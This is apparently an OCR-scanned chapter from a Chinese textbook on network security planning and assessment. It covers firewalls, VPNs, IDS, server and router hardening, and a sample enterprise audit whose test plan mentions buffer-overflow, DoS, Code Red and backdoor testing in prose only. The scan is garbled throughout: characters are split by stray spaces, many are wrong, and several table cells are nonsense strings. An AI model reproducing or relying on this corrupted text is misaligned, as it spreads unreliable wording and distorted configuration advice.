构建 安全 管理 平台 将 会 降低 很 多 因为 无 意 的 人 为 因素 而 造成 的 风险 。 构 建安 全 管理 平 
台 可 以 从 技术 上 组 成 安全 管理 子 网 ,安装 集中 统一 的 安全 管理 软件 ,如 病毒 软件 管理 系统 、 
网 络 设备 管理 系统 及 网 络 安全 设备 管理 软件 。 通 过 安全 管理 平台 实现 全 网 的 安全 管理 。 
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企业 内 部 应 该 经 常 对 单位 员工 进行 网 络 安全 防范 意识 的 培训 ,全 面 提高 员工 的 整体 网 
络 安全 防范 意识 。 

3) 网 络 安全 技术 方案 

网 络 安全 技术 方案 总 体 设计 结构 如 图 6-1 所 示 。 
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图 6-1 网 络 安全 技术 方案 总 体 设计 结构 示意 图 


(1) 全 面 , 动 态 的 安全 策略 。 全 面 的 安全 策略 包含 的 要 素 : 网 络 边界 安全 ,数据 传输 安 
全 ,操作 系统 安全 、 应 用 服务 器 的 安全 和 网 络 防 病毒 。 

动态 的 安全 策略 包含 的 要 素 : 内 部 网 络 人 侵 检 测 和 操作 系统 入 侵 检测 。 

实现 安全 策略 的 技术 和 产品 : 防火 墙 、 加 密 与 认证 技术 、 入 侵 检测 系统 、 漏 洞 检测 和 网 
络 防 病 毒 产品 。 

(2) 防火 墙 与 VPN 技术。 防火 墙 技 术 是 使 用 最 为 广泛 的 安全 技术 ,是 第 一 道 安全 防 
线 , 可 以 实现 网 络 边 界 安全 。 

防火 墙 提 供 VPN 功能 : 可 以 在 两 个 网 关上 的 防火 墙 之 间 建 立 VPN 通道 。 

VPN 采用 4 项 技术 : 隧道 技术 .加 /解密 技术 、 密 钥 管理 技术 和 身份 认证 技术 ,通过 这 
些 技 术 可 以 在 VPN 上 安全 地 传输 数据 。 

对 于 有 多 个 不 同安 全 区 域 的 企业 网 ,使 用 防火 墙 实现 边界 安全 部 署 。 

(3) 选择 和 设置 防火 墙 的 考虑 因素 包括 安全 性 、 配 置 便利 性 、 管 理 的 难 易 度 .可 靠 性 和 
可 扩展 性 。 

(4) 认证 和 加 密 技术 : 包括 采用 数字 证 书 提供 认证 .数字 证 书 的 技术 原理 。 

(5) 解决 方案 : 可 以 借助 于 证 书 认 证 中 心 (CA)。 

(6) 入侵 检测 : IDS 可 以 对 各 种 黑客 攻击 行为 实时 做 出 反应 ,考虑 IDS 的 工作 方式 、 基 
于 主机 的 人 侵 检测 、 基 于 网 络 的 入 侵 检测 、IDS 能 实现 动态 的 安全 要 素 。 

(7) 漏洞 检测 : 模拟 黑客 的 攻击 行为 对 内 部 网 络 或 主机 进行 扫描 ,然后 给 出 安全 漏洞 
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报告 。 
网 络 防 病毒 方案 : 包括 多 层 病毒 防护 体系 、 客 户 端的 防 病毒 系统 .服务 器 端的 防 病毒 系 
统 、 互 联网 的 防 病毒 系统 等 。 

网 络 系 统 安全 的 规划 是 在 需求 分 析 的 基础 上 进行 技术 性 的 论证 ,将 用 户 提出 的 问题 和 
要 求 用 网 络 安全 方面 的 术语 表示 出 来 ,经 过 技术 方面 的 分 析 , 提 出 一 整套 网 络 系统 规划 与 设 
计 的 安全 策略 和 技术 方案 。 网 络 安全 问题 不 单纯 是 网 络 安 全 技术 的 问题 ,网 络 安全 规划 与 
设计 是 一 个 系统 的 复杂 工程 ,必须 精心 规划 和 设计 ,制定 一 个 科学 可 行 的 安全 规划 设计 
方案 。 


6.2 网络 安全 评估 


由 于 计算 机 网 络 是 一 个 庞大 的 系统 ,涉及 硬件 .软件 ,有 系统 的 内 在 因素 ,也 有 外 在 影 
响 , 受 到 许多 方面 的 制约 。 同 时 ,因为 人 们 所 处 的 角度 不 同 ,对 安全 问题 所 得 出 的 结论 也 不 
同 。 在 信息 安全 的 标准 化 中 ,众多 标准 化 组 织 在 安全 需求 服务 分 析 指 导 、 安 全 技术 机 制 开 
发 ,安全 评估 标准 等 方面 制定 了 许多 标准 及 草案 。 因 此 ,必须 有 一 套 比 较 规范 、 统 一 和 通用 
的 安全 评估 标准 。 


6.2.1 评估 的 意义 及 服务 


计算 机 网 络 的 安全 问题 已 成 为 影响 网 络 应 用 健康 发 展 的 重要 因素 。 由 于 安全 问题 针对 
系统 的 应 用 环境 .应 用 领域 以 及 处 理 信息 密级 的 不 同 , 要 求 有 很 大 差别 ,所 以 ,安全 问题 是 计 
算 机 网 络 系统 能 否 正常 使 用 的 关键 问题 之 一 。 计 算 机 网 络 的 安全 要 求 是 依据 其 处 理 信息 的 
密级 种 类 、 系 统 用 途 以 及 应 用 环境 的 不 同 而 提出 来 的 。 例 如 ,处 理 秘 密 信息 的 系统 与 处 理 绝 
密 信息 的 系统 要 求 不 同 ; 处 理 相同 密级 的 敏感 信息 的 军事 要 求 与 商业 要 求 不 同 ; 在 战 时 环 
境 与 平时 环境 处 理 信 息 的 安全 要 求 也 不 同 , 这 就 要 求 对 系统 的 可 靠 性 .安全 性 和 保密 性 有 定 
量 或 定性 的 评估 标准 。 

1. 安全 评估 标准 的 意义 

计算 机 网 络 安全 的 评估 标准 可 作为 系统 安全 评价 的 依据 ,也 是 各 产品 和 服务 提供 商 衔 
量 其 产品 和 服务 是 否 符合 系统 安全 需求 的 依据 ,避免 同一 系统 同一 应 用 的 多 种 评价 结果 。 
安全 评估 标准 的 重要 意义 主要 有 以 下 几 点 : 

(1) 指导 用 户 建立 符合 安全 需求 的 网 络 。 用 户 为 了 系统 的 安全 ,首先 根据 自己 应 用 的 
安全 级 别 ,选用 评定 了 安全 等 级 的 计算 机 网 络 系统 产品 (如 适用 的 操作 系统 .适宜 的 数据 库 
产品 .适合 的 网 络 结构 等 ) ,并 在 此 基础 上 采取 合适 的 安全 措施 。 

(2) 建立 系统 内 其 他 部 件 的 安全 评估 标准 。 系统 的 安全 是 多 方面 的 ,有 了 符合 安全 构 
架 的 网 络 ,还 应 建立 系统 内 其 他 部 件 的 安全 评估 标准 :如 WWW、E-mail、.FTP、Telnet 等 应 
用 的 安全 标准 。 配 合 操作 系统 和 平台 的 安全 性 ,实现 尽 可 能 完善 的 性 能 。 

采用 统一 的 安全 评估 标准 ,无 论 对 生产 厂家 还 是 用 户 都 大 有 益处 。 一 方面 ,生产 厂家 根 
据 统一 的 评估 标准 ,生产 出 符合 不 同安 全 需要 的 计算 机 网 络 产品 ; 另 一 方面 ,用 户 根据 自己 
的 应 用 环境 和 不 同 的 用 途 , 选 择 符合 需要 的 计算 机 网 络 产品 。 正 是 基于 上 述 目的 ,各 国都 非 
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常 重视 在 这 方面 的 研究 ,美国 和 欧盟 等 先后 制定 了 相应 的 计算 机 系统 和 网 络 系统 的 安全 评 
佑 标准。 

2. 网 络 安全 评估 服务 

网 络 安全 评估 服务 主要 包括 如 下 内 容 : 

(1) 审核 企业 安全 架构 中 相关 的 人 员 及 过 程 ,包括 策略 组织. 人 员 资产 .风险 评估 及 
最 小 化 .物理 安全 ,访问 控制 .网 络 和 计算 机 的 管理 .事务 的 连续 性 、 系 统 发 展 的 规划 、 最 佳 实 
践 及 调整 的 顺序 。 

(2) 审核 整个 企业 内 部 网 络 中 每 台 联 网 主机 的 开放 端口 及 存在 的 相应 的 安全 隐患 。 

(3) 审核 整个 企业 内 部 网 络 中 每 台 联 网 主机 使 用 的 网 络 协 议 及 应 用 ,确保 应 用 与 安全 
的 统一 ,保证 安全 的 最 大 化 。 

(4) 审核 整个 企业 内 部 网 络 的 设计 ,确定 以 业务 功能 为 基础 的 资产 分 段 和 访问 上 的 有 
效 性 。 

(5) 详细 正式 的 评估 报告 ,包括 详细 的 长 期 及 短期 改进 的 建议 。 

网 络 安全 评估 是 一 个 比较 泛 化 的 概念 ,其 核心 是 网 络 安全 风险 评估 。 随 着 业界 对 于 信 
息 安全 问题 认识 的 不 断 深 入 和 信息 安全 体系 的 不 断 实 践 , 越 来 越 多 的 人 发 现 信息 安全 问题 
最 终 都 归结 为 一 个 风险 管理 问题 。 据 统计 ,国外 发 达 国 家 用 在 信息 安全 评估 上 的 投资 占 企 
业 总 投资 的 1%~5%, 电 信和 金融 行业 能 达到 3% 一 5%。 而 且 , 企 业 的 安全 风险 信息 是 动 
态 变 化 的 ,只 有 动态 的 信息 安全 评估 才能 发 现 和 跟踪 最 新 的 安全 风险 。 所 以 企业 的 网 络 信 
息 安全 评估 是 一 个 长 期 持续 的 工作 ,通常 应 该 每 隔 1 一 3 年 就 进行 一 次 安全 风险 评估 。 


6.2.2 评估 方案 实例 


网 络 系统 安全 评估 方式 为 软件 测试 和 人 工分 析 ,一 般 分 5 个 步骤 进行 ， 

第 一 步 ,进行 实体 的 安全 性 评估 。 

第 二 步 , 对 网 络 与 通信 的 安全 性 进行 评估 。 

第 三 步 , 对 实际 应 用 系统 的 安全 性 进行 评估 。 

第 四 步 , 由 评估 小 组 的 工程 师 亲 自 对 评估 的 结果 进行 分 析 汇 总 ,并 对 部 分 项 目 进 行 手动 
检测 ,消除 漏 报 情况 。 

第 五 步 ,根据 评估 的 结果 ,得 出 此 次 评估 的 评估 报告 。 

1. 管理 制度 

管理 制度 是 否 健全 是 做 好 网 络 安全 的 有 力 保障 ,包括 机 房管 理 制 度 、 文 档 设备 管理 制 
度 .管理 人 员 培 训 制 度 、 系 统 使 用 管理 制度 等 。 

评估 内 容 为 对 公司 的 信息 网 络 系统 的 各 项 管理 制度 进行 细致 的 评估 ,并 对 各 项 评估 的 
结果 进行 详细 分 析 , 找 出 原因 ,说 明 存 在 哪些 漏洞 ,例如 由 于 公司 网 络 信息 系统 刚刚 建立 ,各 
项 管理 规章 制度 均 不 够 健全 ,为 今后 的 管理 留 下 了 隐患 ,网 络 系统 的 管理 上 存在 许多 漏洞 。 

2. 物理 安全 

物理 安全 是 网 络 安全 的 基础 。 评 估 内 容 一 般 包 括 场 地 安全 、 机 房 环境 、 建 筑 物 安全 、 设 
备 可 靠 性 ,辐射 控制 、 通 信 线 路 安全 性 ,动力 安全 性 、 灾 难 预防 与 恢复 措施 等 方面 。 

计算 机 机 房 的 设计 或 改建 应 符合 GB2887、GB9361 和 GJB322 等 现行 的 国家 标准 。 除 
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参照 上 述 有 关 标 准 外 ,还 应 注意 满足 下 述 各 项 要 求 : 

。 机 房 主体 结构 应 具有 与 其 功能 相 适 应 的 耐久 性 、 抗 震 性 和 耐火 等 级 。 变 形 颖 和 伸缩 

颖 不 应 穿 过 主机 房 ; 

机 房 应 设置 相应 的 火灾 报警 和 灭火 系统 ; 

机 房 应 配置 芍 散 照明 设备 并 设置 安全 出 口 标志 ; 

。 机 房 应 采用 专用 的 空调 设备 , 若 与 其 他 系统 共用 时 ,应 确保 空调 效果 ,采取 防火 隔离 
措施 。 长 期 连续 运行 的 计算 机 系统 应 有 备用 空调 。 空 调 的 制冷 能 力 , 要 留 有 一 定 的 
余 量 ( 宜 取 15%% 一 20%%); 

。 计算 机 的 专用 空调 设备 应 与 计算 机 联 控 , 保 证 做 到 开机 前 先 送 风 , 停 机 后 再 停 风 ; 

。 机 房 应 根据 供电 网 的 质量 及 计算 机 设备 的 要 求 , 采 用 电源 质量 改善 措施 和 隔离 防护 
措施 ,如 滤波 、 稳 压 、 稳 频 及 不 间断 电源 系统 等 ; 

。 计算 机 系统 中 使 用 的 设备 应 符合 GB4943 中 规定 的 要 求 ,并 是 经 过 安全 检查 的 合格 
产品 。 

评估 方法 是 通过 对 公司 各 节点 的 实地 考察 测量 ,看 是 否 存在 以 下 不 安全 因素 : 

。 场地 安全 措施 是 否 得 当 , 机 房 环境 好 坏 ; 

。 是 否 考虑 了 辐射 控制 安全 性 ; 

。 通信 线路 的 安全 性 ; 

全 动力 可 靠 性 ; 

。 灾难 预防 与 恢复 的 能 力 。 

3. 计算 机 系统 的 安全 性 


计算 机 系统 的 安全 性 又 称 平台 安全 性 。 平 台 安全 泛 指 操作 系统 和 通用 基础 服务 安全 ， 
主要 用 于 防范 黑客 攻击 。 

1) 评估 内 容 

分 别 对 Proxy Server/ Web Server/Printer Server 等 各 服务 器 进行 扫描 检测 ,并 做 详细 
让 未 5 

计算 机 系统 的 安全 评估 主要 在 于 分 析 计 算 机 系统 存在 的 安全 弱点 和 确定 可 能 存在 的 威 
胁 和 风险 ,并 且 针 对 这 些 弱 点 ,威胁 和 风险 提出 解决 方案 。 

计算 机 系统 存在 的 安全 弱点 和 信息 资产 紧密 相连 , 它 可 能 被 威胁 利用 、 引 起 资产 损失 或 
伤害 。 但 是 ,安全 弱点 本 身 不 会 造成 损失 , 它 只 是 一 种 条 件 或 环境 ,但 可 能 导致 被 威胁 利用 
而 造成 资产 损失 。 安 全 弱点 的 出 现 有 各 种 原因 ,它们 的 共同 特性 就 是 给 攻击 者 提供 了 对 主 
机 系统 或 者 其 他 信息 系统 攻击 的 机 会 。 

安全 威胁 是 一 种 对 系统 、 组 织 及 其 资产 构成 潜在 破坏 力 的 可 能 性 因素 或 者 事件 。 产 生 
安全 威胁 的 主要 因素 可 以 分 为 人 为 因素 和 环境 因素 。 人 为 因素 包括 有 意 的 和 无 意 的 因素 。 
环境 因素 包括 自然 界 的 不 可 抗力 因素 和 其 他 物理 因素 。 

安全 风险 是 指 某 个 威胁 利用 弱点 引起 某 项 信息 资产 或 一 组 信息 资产 的 损害 ,从 而 直接 
或 间接 地 引起 企业 或 机 构 信 息 系统 损害 的 可 能 性 。 

数据 的 安全 性 包括 SCSI 热 插 拔 硬盘 没有 安全 锁 , 人 员 杂 乱 , 硬 盘 很 容易 取 走 ; 数据 存 
储 缺 乏 元 余 备 份 机 制 ; 数据 的 访问 采用 了 工作 组 方式 ,未 考虑 是 否 需要 验证 ; 没有 备份 措 
施 ,硬盘 损坏 不 能 恢复 等 等 。 
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2) 评估 分 析 报 告 

经 过 对 服务 器 的 扫描 记录 分 析 , 可 以 发 现 该 网 络 中 的 服务 器 系统 的 主要 弱点 有 : 

。 系统 自身 存在 弱点 。 对 于 Windows Server 2016 系统 的 补丁 更 新 不 及 时 ,没有 进行 
安全 配置 ,系统 运行 在 默认 的 安装 状态 ,非常 危险 。 有 的 服务 器 系统 ,虽然 补丁 更 新 
比较 及 时 ,但 是 配置 上 存在 很 大 安全 隐患 ,用 户 密码 口令 的 强度 非常 低 ,很 多 还 在 使 
用 默认 的 弱 口令 ,网络 攻击 者 可 以 非常 轻易 地 接管 整个 服务 器 。 另 外 存在 ipc$ 这 
样 的 匿名 共享 ,可 能 会 泄露 很 多 服务 器 的 敏感 信息 。 

。 系统 管理 存在 弱点 。 在 系统 管理 上 缺乏 统一 的 管理 策略 ,比如 缺乏 对 用 户 轮廓 文件 

(profile) 的 支持 。 

数据 库 系 统 的 弱点 。 数 据 库 系统 的 用 户 权限 设置 不 当 和 允许 执行 外 部 系统 指令 是 

该 系统 最 大 的 安全 弱点 ,由 于 未 对 数据 库 采 取 明 显 的 安全 措施 ,因此 应 进一步 对 数 

据 库 安装 最 新 的 升级 补丁 。 

来 自 周 边 机 器 的 威胁 。 手 工 测 试 发 现 部 分 周边 机 器 明显 存在 严重 安全 漏洞 ,来 自 周 

边 机 器 的 安全 弱点 (比如 可 能 是 用 同样 的 密码 等 等 ) 将 是 影响 网 络 的 最 大 威胁 。 

3) 建议 

。 主机 安全 系统 增强 配置 (如 表 6-1 所 示 ) 。 

表 6-1 主机 安全 系统 增强 配置 
Windows Server 2016 安全 增强 配置 


对 Windows Server 2016 中 那些 易 造成 安全 隐患 的 默认 配置 重新 设置 ,诸如 : 系 
统 引 导 时 间 设 置 为 0s、 从 登录 对 话 框 中 删除 关机 按钮 等 





基本 配置 管理 





文件 系统 配置 对 涉及 文件 系统 的 安全 漏洞 进行 修补 或 是 修改 配置 ,诸如 : 采用 NTFS 格式 等 





对 涉及 用 户 账号 的 安全 隐患 通过 配置 或 修补 消除 ,诸如 : 设置 口令 长 度 、 检 查 用 











是 户 账号 、 组 成 员 关系 和 特权 等 
网 络 管理 配置 通过 对 易 造成 安全 隐患 的 系统 网 络 配置 进行 安全 基本 配置 ,诸如 : 锁定 管理 员 
的 网 络 连接 ,检查 网 络 共享 情况 或 去 除 TCP/IP 中 的 NetBIOS 绑 定 等 
利用 某 些 安全 工具 增强 系统 的 安全 性 ,诸如 : 运行 syskey 工具 为 数据 库 提供 其 
二 他 额外 的 安全 措施 等 
病毒 和 木马 保护 TD 





其 他 服务 安全 配置 | 针对 系统 需要 提供 的 其 他 服务 ,进行 安全 配置 ,诸如 : DNS、Mail 等 





。 MS-SQL 服务 器 安全 管理 和 配置 建议 。 

更 改 用 户 弱 口 令 ; 安装 最 新 的 SQL 服务 器 补丁 SP3; 尽 可 能 删除 所 有 数据 库 中 的 
Guest 账号 ; 在 服务 器 的 特性 中 , 设 定 比较 高 的 审计 等 级 ; 限制 只 有 sysadmin 的 等 级 用 户 
才 可 以 进行 CmdExec 任务 ; 选择 更 强 的 认证 方式 ; 设 定 合 适 的 数据 库 备份 策略 ; 设 定 确切 
的 扩展 存储 进程 权限 ; 设 定 statement 权限 ; 设 定 合适 的 组 .用户 权 限 ; 设 定 允许 进行 连接 
的 主机 范围 ; 限制 对 sa 用 户 的 访问 ,分 散 用 户 权限 。 支 持 多 种 验证 方式 。 

。 媒 体 管理 与 安全 要 求 。 
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媒体 分 类 。 根 据 媒体 上 记录 内 容 将 媒体 分 为 A、B、C 三 种 基本 类 别 。A 类 媒体 : 媒体 上 
的 记录 内 容 对 系统 .设备 功能 来 说 是 最 重要 的 ,不 能 替代 的 ,毁坏 后 不 能 立即 恢复 的 。B 类 媒 
体 : 媒体 上 的 记录 内 容 在 不 影响 系统 主要 功能 的 前 提 下 可 进行 复制 ,但 这 些 数 据 记 录 复 制 过 
程 较 困难 或 价格 较 昂 贵 。C 类 媒体 : 媒体 上 的 记录 内 容 在 系统 调试 及 应 用 过 程 中 容易 得 到 。 

媒体 的 保护 要 求 保留 在 机 房 内 的 媒体 数量 应 是 系统 有 效 运行 所 需 的 最 小 数量 。A、B 
类 媒体 应 放 和 防火、 防水、 防震 、 防 潮 、 防 腐蚀 、 防 静电 及 防 电磁 场 的 保护 设备 中 , 且 必 须 作 备 
份 , 像 主 服务 器 必须 有 备份 域 服务 器 。C 类 媒体 应 放 在 密闭 金属 文件 箱 或 柜 中 。A、B 类 媒 
体 应 采取 防 复制 及 信息 加 密 措 施 。 媒 体 的 传递 与 外 借 应 有 审批 手续 、 传 递 记 录 。 在 重要 数 
据 的 处 理 过 程 中 ,被 批准 使 用 数据 人 员 以 外 的 其 他 人 员 不 应 进入 机 房 工 作 。 处 理 结束 后 ,应 
清除 不 能 带 走 的 本 作业 数据 。 应 妥善 处 理 打 印 结果 ,任何 记 有 重要 信息 的 废弃 物 在 处 理 前 
应 进行 粉碎 。 

对 于 媒体 还 应 进行 严格 的 管理 。 媒 体 应 造 册 登记 ,编制 目录 ,集中 分 类 管理 。 根 据 需 要 
与 存储 环境 ,记录 要 定期 进行 循环 复制 (每 周 /每 月 /半年 ) 备 份 。 新 的 网 络 设备 或 系统 应 有 
完整 的 归档 记录 。 各 种 记录 应 定期 复制 到 媒体 上 , 送 媒 体 库 进 行 保管 。 未 用 过 的 媒体 应 定 
期 检查 ,情况 应 例 行 登记 。 报 废 的 媒体 在 进行 销毁 之 前 ,进行 消 磁 或 清除 数据 ,并 应 确保 销 
毁 的 执行 。 媒 体 未 经 审批 ,不 得 随意 外 借 。 建 立 媒体 库 。 媒 体 库 的 选 址 应 选 在 水 、 火 等 灾害 
影响 不 到 的 地 方 。 媒 体 库 应 设立 库 管理 员 ,负责 管理 工作 ,并 核查 媒体 使 用 人 员 的 身份 与 权 
限 。 媒 体 库 内 所 有 媒体 ,应 统一 编目 ,集中 分 类 管理 。 

4. 网 络 与 通信 安全 

网 络 与 通信 的 安全 性 在 很 大 程度 上 决定 着 整个 网 络 系统 的 安全 性 ,因此 网 络 与 通信 安 
全 的 评估 是 整个 网 络 系统 安全 性 评估 的 关键 。 可 以 从 以 下 几 个 方面 对 网 络 与 通信 安全 性 进 
行 详细 地 测试 。 

1) 评估 内 容 

进行 下 列 项 目 安全 测试 : 

。 扫描 测试 。 从 PC 上 用 任意 扫描 工具 (例如 superscan) 对 目标 主机 进行 扫描 ,目标 主 
机 应 根据 用 户 定义 的 参数 采取 相应 动作 。 
攻击 测试 。Buffer Overflow 攻击 : 从 PC 上 用 Buffer Overflow 攻击 程序 (例如 
snmpxdmid) 对 目标 主机 进行 攻击 ,目标 主机 应 采取 相应 动作 一 一 永久 切断 该 PC 到 
它 的 网 络 连 接 。DoS 攻击 : 从 PC 上 用 DoS 攻击 程序 对 目标 主机 进行 攻击 ,目标 主 
机 应 采取 相应 动作 一 一 临时 切断 该 PC 到 它 的 网 络 连接 。 病 毒 处 理 : 在 Windows 
PC 上 安装 Code Red 病毒 程序 ,对 目标 主机 进行 攻击 ,目标 主机 应 采取 相应 动作 自 
动 为 该 PC 清除 病毒 。 
后 门 检测 。 在 目标 主机 上 安装 后 门 程序 (例如 backhole) , 当 攻 击 者 从 PC 上 利用 该 
后 门 进入 主机 时 ,目标 主机 应 能 自动 报警 ,并 切断 该 PC 到 它 的 网 络 连接 。 
rootkit 检测 。 在 目标 主机 上 安装 后 门 程序 ,并 自动 隐藏 ,目标 主机 应 能 自动 报警 ,并 
启动 文件 检查 程序 ,发现 被 攻击 者 替换 的 系统 软件 。 
漏洞 检测 。 在 目标 主机 检测 到 rootkit 后 .漏洞 检测 自动 启动 ,应 能 发 现 攻击 者 留 下 
的 后 门 程序 ,并 将 其 端口 堵塞 。 用 户 应 能 随时 启动 漏洞 检测 ,发现 系 统 的 当前 漏洞 ， 
并 将 其 端口 堵塞 。 
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。 陷阱 。 系 统 提供 一 些 WWW、CGI 陷阱 , 当 攻 击 者 进入 陷阱 时 ,系统 应 能 报警 。 
密集 攻击 测试 。 使 用 密集 攻击 工具 对 目标 主机 进行 每 分 钟 上 百 次 不 同类 型 的 攻击 ， 
系统 应 能 继续 正常 工作 。 


2) 评估 分 析 报 告 


通过 以 上 不 同类 型 的 测试 ,可 以 得 出 以 下 结论 : 
防火 墙 安 全 性 需要 增强 ; 路 由 器 中 存在 一 些 不 必要 的 服务 。 


3) 建议 


防火 墙 安全 增强 设置 如 表 6-2 所 示 。 


表 6-2 防火 墙 安全 增强 配置 


























防火 墙 安全 增强 配置 
服务 名 称 服务 内 容 
了 解 防火 墙 类 型 ,检查 防火 墙 包 过 滤 功 能 .支持 代理 功能 、 全 状态 检测 功能 
防火 增 访 问 控制 配置 | 以 及 URL 过 滤 功能 ,并 根据 防火 墙 基本 配置 方案 进行 访问 控制 配置 
根据 制定 的 防火 墙 基本 配置 方案 ,配置 防火 墙 的 NAT 方 式 \ 一 对 二 NAT 
防火 墙 NAT 方 式 配 置 | 及 对 条 NA 
测试 防火 墙 是 否 支持 透明 方式 以 及 有 无 局 限 性 ,配置 透明 方式 和 NAT 方 
肪 火 壤 和 明 方 式 配置 。 | 六 总 竺 名 四 叶 计 用 
检查 防火 墙 是 否 支持 带宽 管理 及 其 管理 协议 和 方式 "制定 防 灰 墙 基本 配置 
防火 墙 带宽 管理 配置 | 方案 ,按照 相应 的 方式 配置 防火 墙 
检查 防火 墙 系统 管理 的 协议 及 其 安全 性 ,并 通过 相应 的 系统 管理 界面, 根据 
防火 增 系 统管 理 配置 | 制定 的 防火 墙 基本 配置 方案 对 防火 墙 进行 管理 
OU 检查 防 火 寺 升 级 方式 及 其 可 革 性 ,根据 抽 定 的 防 灰 二 基本 二 生 方 案 , 利 用 相 





应 升级 方式 对 防火 墙 进行 软件 升级 


。 路 由 器 的 增强 安全 设置 如 表 6-3 所 示 。 


表 6-3 路 由 器 安全 增强 配置 








服务 名 称 服务 内 容 
Global 服务 配置 通过 考察 骨干 节点 上 的 骨干 路 由 配置 情况 ,结合 实际 需求 ,打开 某 些 必要 的 
服务 或 者 是 关闭 一 些 不 必要 的 服务 。 例 如 ,no service finger 
根据 制定 好 的 基本 配置 方案 对 路 由 器 进行 配置 检查 , 删 去 某 些 不 必要 的 ip 
Interface 服务 配置 


特性 ,诸如 : no ip redirects 





Login banner 配置 


修改 login banner ,隐藏 路 由 器 系统 真实 信息 





Ident 配置 


通过 ident 配置 来 增加 路 由 器 安全 性 





Ingress 和 Egress 路 由 过 滤 


在 边界 路 由 器 上 配置 ingress 和 egress 





Unicast RPF 配置 


通过 配置 unicast RPF ,保护 ISP 的 客户 来 增强 ISP 自身 的 安全 性 。 对 服务 
提供 Single Homed 租用 线 客户 .PSTNVISDNVXdsl 客户 或 是 Multihomed 
租用 线路 客户 的 Unicast RPF 配置 





路 由 协议 验证 配置 


配置 临近 路 由 器 验证 协议 ,以 确保 可 靠 性 路 由 信息 的 交换 ,可 以 配置 明文 验 
证 或 是 MD5 验证 来 加 密 





vty 访问 配置 





配置 vty 的 访问 方式 ,如 ssh 来 增加 系统 访问 的 安全 性 
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5. 日 志 与 统计 

日 志 、 统 计 是 否 完整 .详细 是 计算 机 网 络 系统 安全 的 一 个 重要 内 容 , 是 为 管理 人 员 及 时 
发 现 、 解 决 问题 的 保证 。 

评估 内 容 为 web/printer server 和 proxy server 等 服务 器 或 重要 的 设备 是 否 设 置 了 对 
事件 日 志 进 行 审核 记录 ,这 些 数 据 保存 的 期 限 ,系统 日 志 的 存储 是 否 存在 漏洞 等 ; 系统 是 否 
经 常 到 微软 官方 网 站 上 下 载 最 新 的 各 种 Windows 补丁 程序 更 新 操作 系统 ,然后 对 事件 日 志 
进行 设置 ,对 较 长 时 间 的 各 种 信息 进行 记录 。 

6. 安全 保障 措施 

安全 保障 措施 是 对 以 上 各 个 层次 的 安全 性 提供 保障 机 制 , 以 用 户 单位 网 络 系统 的 特点 、 

实际 条 件 和 管理 要 求 为 依据 ,利用 各 种 安全 管理 机 制 ,为 用 户 综合 控制 风险 、 降 低 损 失 和 消 
耗 ,提高 安全 生产 效益 。 

1) 评估 内 容 

。 网 络 信息 中 心 管理 人 员 是 否 太 少 。 

。 设备 间 、 网 管 室 和 值班 室 是 否 在 一 个 办 公 室内 。 这 对 网 络 设备 的 管理 造成 了 非常 严 
重 的 不 安全 隐患 。 

。 各 种 系统 文档 是 否 健全 ,健全 的 文档 可 以 为 今后 做 好 系统 维护 提供 保障 。 该 企业 有 
没有 健全 的 文档 管理 制度 ,各 种 系统 集成 文档 是 否 基本 完整 等 。 

。 机 房 设备 的 管理 是 否 规范 。 

2) 建议 

。 安全 管理 。 安 全 组 织 或 安全 负责 人 职责 如 下 : 保障 本 部 门 计算 机 系统 的 安全 运行 ; 
制定 安全 管理 的 方案 和 规章 制度 ; 定期 检查 安全 规章 制度 的 执行 情况 ,提出 改进 措 
施 ; 掌握 系统 运行 的 安全 情况 ,收集 安全 记录 ,及 时 发 现 薄 弱 环 节 , 研 究 和 采取 相应 
的 对 策 ,并 及 时 予以 改进 ; 负责 系统 工作 人 员 的 安全 教育 和 管理 ; 向 安全 监督 机 关 
和 上 一 级 主管 部 门 报告 本 系统 的 安全 情况 。 

。 计算 机 工作 人 员 责 任 : 应 规定 计算 机 工作 人 员 职 责 ( 内 容 包 括 硬件 值班 人 员 职 责 、 
硬件 维修 人 员 条 件 、 操 作 人 员 人 须知 ); 计算 机 工作 人 员 必 须 严格 遵守 有 关 规 定 和 本 
系统 的 安全 规章 制度 ,维护 本 系统 的 安全 。 

。 计算 机 系统 的 维护 应 制定 计算 机 系统 维护 计划 ,确定 维护 检查 的 实施 周期 。 计 算 机 
系统 的 维护 分 为 预防 维护 和 故障 维护 。 预 防 维护 应 定期 进行 ,故障 维护 应 及 时 分 析 
原因 找 出 问题 ,尽快 恢复 ,并 认真 填写 维护 记录 。 计 算 机 系统 各 设备 (包括 主 处 理 
机 、 主 存储 器 、 磁 盘 机 等 ) 应 定期 检查 维护 。 计 算 机 系统 维护 时 ,对 数据 应 采取 妥善 
的 保护 措施 。 计 算 机 系统 要 定期 进行 故障 统计 分 析 。 必 须 建立 计算 机 系统 的 维护 
档案 。 

。 机 房 的 监视 。 计算机 机 房 应 视 具体 情况 设置 监视 设备 ,及 时 发 现 异 常 状态 ,根据 不 
同 的 使 用 目的 可 配备 以 下 监视 设备 : 红外 线 传感器 ; 自动 火灾 报警 器 ; 漏水 传 感 
器 ; 温 湿度 传感器 ; 监视 摄像 机 ; 安全 人 员 应 随时 对 机 房 进行 巡视 ,注意 发 现 产生 
危险 ,故障 的 征兆 及 其 原因 ,检查 防 灾 防 范 设备 的 功能 等 。 

。 人 身 安全 及 教育 培训 。 计 算 机 机 房 的 布局 应 为 工作 人 员 创 造 一 个 良好 的 人 机 工作 
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环境 。 长 期 从 事 计算 机 工作 的 人 员 ,应 有 劳保 措施 ,并 定期 检查 身体 。 在 使 用 说 明 
书 中 应 有 操作 维护 的 安全 注意 事项 ,并 在 危险 部 位 标 以 危险 符号 和 警告 标记 。 所 
有 对 地 的 电压 (交流 峰值 或 直流 ) 大 于 42. 2V 的 易 触及 部 分 , 均 应 加 以 安全 保护 。 
应 定期 对 使 用 人 员 进 行 安全 教育 及 培训 。 
7. 评估 结果 
通过 模拟 用 户 行为 ,对 以 上 指标 进行 现场 测试 ,不 仅 能 够 了 解 用 户 对 网 络 安 全 质量 的 真 
实感 受 , 还 能 够 对 现场 测试 结果 进行 综合 评估 ,从 用 户 体验 的 角度 对 网 络 安全 进行 全 面 评 
价 ,为 各 个 方面 建立 安全 策略 ,形成 安全 制度 ,并 通过 培训 和 促进 措施 ,保证 各 项 安全 管理 制 
度 落 到 实处 。 最 后 根据 总 体 评估 的 结果 , 写 出 评估 分 析 报 告 ,包括 防火 墙 安 全 的 评估 、 路 由 
器 配置 的 评估 ,在 此 基础 上 得 出 结论 ,说 明 该 企业 的 网 络 信息 系统 的 安全 是 否 存在 严重 
漏洞 。 


习 题 6 


6.1 网 络 安全 方案 设计 

